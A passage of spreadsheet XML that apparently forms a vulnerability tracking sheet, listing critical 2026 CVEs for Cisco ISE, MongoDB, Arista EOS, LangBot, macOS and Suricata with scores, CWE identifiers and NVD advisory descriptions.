      <c r="E96" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F96" s="5" t="inlineStr">
        <is>
          <t>hp-security-alert@hp.com</t>
        </is>
      </c>
      <c r="G96" s="5" t="inlineStr"/>
      <c r="H96" s="5" t="inlineStr"/>
      <c r="I96" s="5" t="inlineStr"/>
      <c r="J96" s="5" t="inlineStr"/>
      <c r="K96" s="5" t="inlineStr"/>
      <c r="L96" s="5" t="inlineStr"/>
      <c r="M96" s="5" t="inlineStr"/>
      <c r="N96" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O96" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P96" s="5" t="inlineStr"/>
      <c r="Q96" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R96" s="5" t="inlineStr">
        <is>
          <t>HP has identified and remediated multiple externally reported vulnerabilities within HPLIP. The findings affect several software components that could potentially enable remote code execution, privilege escalation, denial of service, information disclosure, or unauthorized file modification under certain conditions.</t>
        </is>
      </c>
      <c r="S96" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91104</t>
        </is>
      </c>
    </row>
    <row r="97">
      <c r="A97" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B97" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C97" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91106</t>
        </is>
      </c>
      <c r="D97" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E97" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F97" s="5" t="inlineStr">
        <is>
          <t>hp-security-alert@hp.com</t>
        </is>
      </c>
      <c r="G97" s="5" t="inlineStr"/>
      <c r="H97" s="5" t="inlineStr"/>
      <c r="I97" s="5" t="inlineStr"/>
      <c r="J97" s="5" t="inlineStr"/>
      <c r="K97" s="5" t="inlineStr"/>
      <c r="L97" s="5" t="inlineStr"/>
      <c r="M97" s="5" t="inlineStr"/>
      <c r="N97" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O97" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P97" s="5" t="inlineStr"/>
      <c r="Q97" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R97" s="5" t="inlineStr">
        <is>
          <t>HP has identified and remediated multiple externally reported vulnerabilities within HPLIP. The findings affect several software components that could potentially enable remote code execution, privilege escalation, denial of service, information disclosure, or unauthorized file modification under certain conditions.</t>
        </is>
      </c>
      <c r="S97" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91106</t>
        </is>
      </c>
    </row>
    <row r="98">
      <c r="A98" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B98" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C98" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73456</t>
        </is>
      </c>
      <c r="D98" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E98" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F98" s="5" t="inlineStr">
        <is>
          <t>psirt@arista.com</t>
        </is>
      </c>
      <c r="G98" s="5" t="inlineStr"/>
      <c r="H98" s="5" t="inlineStr"/>
      <c r="I98" s="5" t="inlineStr"/>
      <c r="J98" s="5" t="inlineStr"/>
      <c r="K98" s="5" t="inlineStr"/>
      <c r="L98" s="5" t="inlineStr"/>
      <c r="M98" s="5" t="inlineStr"/>
      <c r="N98" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O98" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P98" s="5" t="inlineStr"/>
      <c r="Q98" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R98" s="5" t="inlineStr">
        <is>
          <t>Under certain circumstances on affected platforms running Arista EOS with gRPC Network Packet Sampling Interface (gNPSI) enabled, an unauthenticated gNPSI client can craft a malicious request to allow arbitrary code execution, granting an attacker full administrative control over the compromised switch.</t>
        </is>
      </c>
      <c r="S98" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73456</t>
        </is>
      </c>
    </row>
    <row r="99">
      <c r="A99" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B99" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C99" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82067</t>
        </is>
      </c>
      <c r="D99" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E99" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F99" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G99" s="5" t="inlineStr"/>
      <c r="H99" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I99" s="5" t="inlineStr"/>
      <c r="J99" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K99" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L99" s="5" t="inlineStr"/>
      <c r="M99" s="5" t="inlineStr"/>
      <c r="N99" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O99" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P99" s="5" t="inlineStr"/>
      <c r="Q99" s="5" t="inlineStr">
        <is>
          <t>CWE-178</t>
        </is>
      </c>
      <c r="R99" s="5" t="inlineStr">
        <is>
          <t>Improper handling of case sensitivity in the configuration validation component of MongoDB Server may cause the authorization subsystem to remain in a default disabled state during server startup. An unauthenticated user with network access to a deployment where this condition occurs can perform arbitrary administrative operations, resulting in full impact of data confidentiality, integrity, and availability.</t>
        </is>
      </c>
      <c r="S99" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82067</t>
        </is>
      </c>
    </row>
    <row r="100">
      <c r="A100" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B100" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C100" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90562</t>
        </is>
      </c>
      <c r="D100" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E100" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F100" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G100" s="5" t="inlineStr"/>
      <c r="H100" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I100" s="5" t="inlineStr"/>
      <c r="J100" s="5" t="inlineStr"/>
      <c r="K100" s="5" t="inlineStr"/>
      <c r="L100" s="5" t="inlineStr"/>
      <c r="M100" s="5" t="inlineStr"/>
      <c r="N100" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O100" s="5" t="inlineStr">
        <is>
          <t>2026-09-13</t>
        </is>
      </c>
      <c r="P100" s="5" t="inlineStr"/>
      <c r="Q100" s="5" t="inlineStr">
        <is>
          <t>CWE-331</t>
        </is>
      </c>
      <c r="R100" s="5" t="inlineStr">
        <is>
          <t>LangBot before 4.10.11 generates password recovery keys with only 24 bits of entropy and applies no rate limiting to the unauthenticated reset-password endpoint. Remote attackers knowing the administrator email can exhaust the keyspace through concurrent requests to reset the admin password and gain account access.</t>
        </is>
      </c>
      <c r="S100" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90562</t>
        </is>
      </c>
    </row>
    <row r="101">
      <c r="A101" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B101" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C101" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15638</t>
        </is>
      </c>
      <c r="D101" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E101" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F101" s="5" t="inlineStr">
        <is>
          <t>1443cd92-d354-46d2-9290-d812316ca43a</t>
        </is>
      </c>
      <c r="G101" s="5" t="inlineStr"/>
      <c r="H101" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I101" s="5" t="inlineStr"/>
      <c r="J101" s="5" t="inlineStr"/>
      <c r="K101" s="5" t="inlineStr"/>
      <c r="L101" s="5" t="inlineStr"/>
      <c r="M101" s="5" t="inlineStr"/>
      <c r="N101" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O101" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P101" s="5" t="inlineStr"/>
      <c r="Q101" s="5" t="inlineStr">
        <is>
          <t>CWE-327</t>
        </is>
      </c>
      <c r="R101" s="5" t="inlineStr">
        <is>
          <t>An unauthenticated user with access to Secret Server could leverage a padding oracle to decrypt or encrypt data using one of the server's cryptographic keys. The key itself is not exposed.</t>
        </is>
      </c>
      <c r="S101" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15638</t>
        </is>
      </c>
    </row>
    <row r="102">
      <c r="A102" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B102" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C102" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20176</t>
        </is>
      </c>
      <c r="D102" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E102" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F102" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G102" s="5" t="inlineStr"/>
      <c r="H102" s="5" t="inlineStr"/>
      <c r="I102" s="5" t="inlineStr"/>
      <c r="J102" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K102" s="5" t="inlineStr"/>
      <c r="L102" s="5" t="inlineStr"/>
      <c r="M102" s="5" t="inlineStr"/>
      <c r="N102" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O102" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P102" s="5" t="inlineStr"/>
      <c r="Q102" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="R102" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in Cisco ISE could allow an authenticated, remote attacker to execute arbitrary commands on the underlying operating system of an affected device. To exploit this vulnerability, the attacker must have valid high-privileged administrative credentials.
This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to obtain system-level access to the underlying operating system and then elevate privileges to root. In single-node deployments, successful exploitation of this vulnerability could cause the affected ISE node to become unavailable, resulting in a DoS condition. In that condition, endpoints that have not already authenticated would be unable to access the network until the node is restored.</t>
        </is>
      </c>
      <c r="S102" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20176</t>
        </is>
      </c>
    </row>
    <row r="103">
      <c r="A103" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B103" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C103" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20194</t>
        </is>
      </c>
      <c r="D103" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E103" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F103" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G103" s="5" t="inlineStr"/>
      <c r="H103" s="5" t="inlineStr"/>
      <c r="I103" s="5" t="inlineStr"/>
      <c r="J103" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K103" s="5" t="inlineStr"/>
      <c r="L103" s="5" t="inlineStr"/>
      <c r="M103" s="5" t="inlineStr"/>
      <c r="N103" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O103" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P103" s="5" t="inlineStr"/>
      <c r="Q103" s="5" t="inlineStr">
        <is>
          <t>CWE-669</t>
        </is>
      </c>
      <c r="R103" s="5" t="inlineStr">
        <is>
          <t>As part of Cisco's ongoing commitment to proactive security and product quality, the Cisco Identity Services Engine (ISE) and Cisco ISE Passive Identity Connector (ISE-PIC), engineering teams have conducted a comprehensive internal security review. This review resulted in a software hardening release that addresses multiple internally discovered vulnerabilities.
The vulnerabilities tracked by CVE-2026-20194 are related to incorrect resource transfer between spheres that are grouped under the Common Weakness Enumeration (CWE) Pillar CWE-669.</t>
        </is>
      </c>
      <c r="S103" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20194</t>
        </is>
      </c>
    </row>
    <row r="104">
      <c r="A104" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B104" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C104" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20211</t>
        </is>
      </c>
      <c r="D104" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E104" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F104" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G104" s="5" t="inlineStr"/>
      <c r="H104" s="5" t="inlineStr"/>
      <c r="I104" s="5" t="inlineStr"/>
      <c r="J104" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K104" s="5" t="inlineStr"/>
      <c r="L104" s="5" t="inlineStr"/>
      <c r="M104" s="5" t="inlineStr"/>
      <c r="N104" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O104" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P104" s="5" t="inlineStr"/>
      <c r="Q104" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R104" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in Cisco ISE could allow an authenticated, remote attacker to execute arbitrary commands on the underlying operating system of an affected device. To exploit this vulnerability, the attacker must have valid high-privileged administrative credentials.
This vulnerability is due to insecure deserialization of Java objects by the affected software. An attacker could exploit this vulnerability by sending a crafted serialized Java object to an affected device. A successful exploit could allow the attacker to obtain user-level access to the underlying operating system and then elevate privileges to&amp;nbsp;root. In single-node deployments, successful exploitation of this vulnerability could cause the affected ISE node to become unavailable, resulting in a DoS condition. In that condition, endpoints that have not already authenticated would be unable to access the network until the node is restored.</t>
        </is>
      </c>
      <c r="S104" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20211</t>
        </is>
      </c>
    </row>
    <row r="105">
      <c r="A105" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B105" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C105" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20237</t>
        </is>
      </c>
      <c r="D105" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E105" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F105" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G105" s="5" t="inlineStr"/>
      <c r="H105" s="5" t="inlineStr"/>
      <c r="I105" s="5" t="inlineStr"/>
      <c r="J105" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K105" s="5" t="inlineStr"/>
      <c r="L105" s="5" t="inlineStr"/>
      <c r="M105" s="5" t="inlineStr"/>
      <c r="N105" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O105" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P105" s="5" t="inlineStr"/>
      <c r="Q105" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R105" s="5" t="inlineStr">
        <is>
          <t>As part of Cisco's ongoing commitment to proactive security and product quality, the Cisco Identity Services Engine (ISE) and Cisco ISE Passive Identity Connector (ISE-PIC), engineering teams have conducted a comprehensive internal security review. This review resulted in a software hardening release that addresses multiple internally discovered vulnerabilities.
The vulnerabilities tracked by CVE-2026-20237 are related to improper input validation issues that are grouped under the Common Weakness Enumeration (CWE) Pillar CWE-20.</t>
        </is>
      </c>
      <c r="S105" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20237</t>
        </is>
      </c>
    </row>
    <row r="106">
      <c r="A106" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B106" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C106" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20284</t>
        </is>
      </c>
      <c r="D106" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E106" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F106" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G106" s="5" t="inlineStr"/>
      <c r="H106" s="5" t="inlineStr"/>
      <c r="I106" s="5" t="inlineStr"/>
      <c r="J106" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K106" s="5" t="inlineStr"/>
      <c r="L106" s="5" t="inlineStr"/>
      <c r="M106" s="5" t="inlineStr"/>
      <c r="N106" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O106" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P106" s="5" t="inlineStr"/>
      <c r="Q106" s="5" t="inlineStr">
        <is>
          <t>CWE-943</t>
        </is>
      </c>
      <c r="R106" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the SXP REST API of Cisco ISE could allow an authenticated, remote attacker to conduct SQL injection attacks.
This vulnerability is due to insufficient validation of user-supplied input in REST API calls. An attacker could exploit this vulnerability by sending crafted input to an affected device. A successful exploit could allow the attacker to view or modify data on the underlying database for the affected device. In single-node deployments, successful exploitation of this vulnerability could cause the affected ISE node to become unavailable, resulting in a DoS condition. In that condition, endpoints that have not already authenticated would be unable to access the network until the node is restored.
To exploit this vulnerability, the attacker must have valid administrative credentials, have the SXP service enabled, and have at least one SXP connection configured.</t>
        </is>
      </c>
      <c r="S106" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20284</t>
        </is>
      </c>
    </row>
    <row r="107">
      <c r="A107" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B107" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C107" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20305</t>
        </is>
      </c>
      <c r="D107" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E107" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F107" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G107" s="5" t="inlineStr"/>
      <c r="H107" s="5" t="inlineStr"/>
      <c r="I107" s="5" t="inlineStr"/>
      <c r="J107" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K107" s="5" t="inlineStr"/>
      <c r="L107" s="5" t="inlineStr"/>
      <c r="M107" s="5" t="inlineStr"/>
      <c r="N107" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O107" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P107" s="5" t="inlineStr"/>
      <c r="Q107" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R107" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the diagnostic tools of Cisco ISE and ISE-PIC could allow an authenticated, remote attacker to perform command injection attacks on the underlying operating system and elevate privileges to&amp;nbsp;root. To exploit this vulnerability, the attacker must have valid administrative credentials.
This vulnerability is due to improper validation of user-supplied input. An attacker could exploit this vulnerability by sending crafted commands to the web-based management interface of an affected device. A successful exploit could allow the attacker to execute arbitrary code on the device and elevate privileges to root. In single-node deployments, successful exploitation of this vulnerability could cause the affected ISE node to become unavailable, resulting in a denial of service (DoS) condition. In that condition, endpoints that have not already authenticated would be unable to access the network until the node is restored.</t>
        </is>
      </c>
      <c r="S107" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20305</t>
        </is>
      </c>
    </row>
    <row r="108">
      <c r="A108" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B108" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C108" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20306</t>
        </is>
      </c>
      <c r="D108" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E108" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F108" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G108" s="5" t="inlineStr"/>
      <c r="H108" s="5" t="inlineStr"/>
      <c r="I108" s="5" t="inlineStr"/>
      <c r="J108" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K108" s="5" t="inlineStr"/>
      <c r="L108" s="5" t="inlineStr"/>
      <c r="M108" s="5" t="inlineStr"/>
      <c r="N108" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O108" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P108" s="5" t="inlineStr"/>
      <c r="Q108" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R108" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the REST API of Cisco ISE and ISE-PIC could allow an authenticated, remote attacker to perform command injection attacks on the underlying operating system and elevate privileges to root. To exploit this vulnerability, the attacker must have valid administrative credentials.
This vulnerability is due to improper validation of user-supplied input. An attacker could exploit this vulnerability by sending crafted commands to the web-based management interface of an affected device. A successful exploit could allow the attacker to execute arbitrary code on the device and elevate privileges to root. In single-node deployments, successful exploitation of this vulnerability could cause the affected ISE node to become unavailable, resulting in a DoS condition. In that condition, endpoints that have not already authenticated would be unable to access the network until the node is restored.</t>
        </is>
      </c>
      <c r="S108" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20306</t>
        </is>
      </c>
    </row>
    <row r="109">
      <c r="A109" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B109" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C109" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20341</t>
        </is>
      </c>
      <c r="D109" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E109" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F109" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G109" s="5" t="inlineStr"/>
      <c r="H109" s="5" t="inlineStr"/>
      <c r="I109" s="5" t="inlineStr"/>
      <c r="J109" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K109" s="5" t="inlineStr"/>
      <c r="L109" s="5" t="inlineStr"/>
      <c r="M109" s="5" t="inlineStr"/>
      <c r="N109" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O109" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P109" s="5" t="inlineStr"/>
      <c r="Q109" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R109" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the sftunnel inter-device communication protocol of Cisco Secure FMC Software could allow an authenticated, remote attacker to obtain&amp;nbsp;root privileges.
This vulnerability is due to unsecured deserialization of untrusted data over the sftunnel management connection. An attacker could exploit this vulnerability by sending crafted sftunnel remote procedure calls (RPCs). A successful exploit could allow the attacker to gain root privileges on a device that is running Cisco Secure FMC Software and its high-availability peer.
To exploit this vulnerability, the attacker must have valid administrative credentials on a managed Cisco FTD device.</t>
        </is>
      </c>
      <c r="S109" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20341</t>
        </is>
      </c>
    </row>
    <row r="110">
      <c r="A110" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B110" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C110" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-43790</t>
        </is>
      </c>
      <c r="D110" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E110" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F110" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G110" s="5" t="inlineStr"/>
      <c r="H110" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I110" s="5" t="inlineStr"/>
      <c r="J110" s="5" t="inlineStr"/>
      <c r="K110" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L110" s="5" t="inlineStr"/>
      <c r="M110" s="5" t="inlineStr"/>
      <c r="N110" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O110" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P110" s="5" t="inlineStr"/>
      <c r="Q110" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R110" s="5" t="inlineStr">
        <is>
          <t>The issue was addressed with improved memory handling. This issue is fixed in macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7. A remote attacker may be able to cause unexpected system termination or corrupt kernel memory.</t>
        </is>
      </c>
      <c r="S110" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-43790</t>
        </is>
      </c>
    </row>
    <row r="111">
      <c r="A111" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B111" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C111" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45764</t>
        </is>
      </c>
      <c r="D111" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E111" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F111" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G111" s="5" t="inlineStr"/>
      <c r="H111" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I111" s="5" t="inlineStr"/>
      <c r="J111" s="5" t="inlineStr"/>
      <c r="K111" s="5" t="inlineStr">
        <is>
          <t>oisf:suricata</t>
        </is>
      </c>
      <c r="L111" s="5" t="inlineStr"/>
      <c r="M111" s="5" t="inlineStr"/>
      <c r="N111" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O111" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P111" s="5" t="inlineStr"/>
      <c r="Q111" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="R111" s="5" t="inlineStr">
        <is>
          <t>Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. Prior to versions 7.0.16 and 8.0.5, a protocol change while processing HTTP/2 traffic could lead to type confusion in Suricata. Crafted traffic may cause Suricata to crash, resulting in denial of service. Versions 7.0.16 and 8.0.5 contain a fix. As a workaround, disable HTTP/2 parsing if it is not required.</t>
        </is>
      </c>
      <c r="S111" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45764</t>
        </is>
      </c>
    </row>
    <row r="112">
      <c r="A112" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B112" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C112" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49364</t>
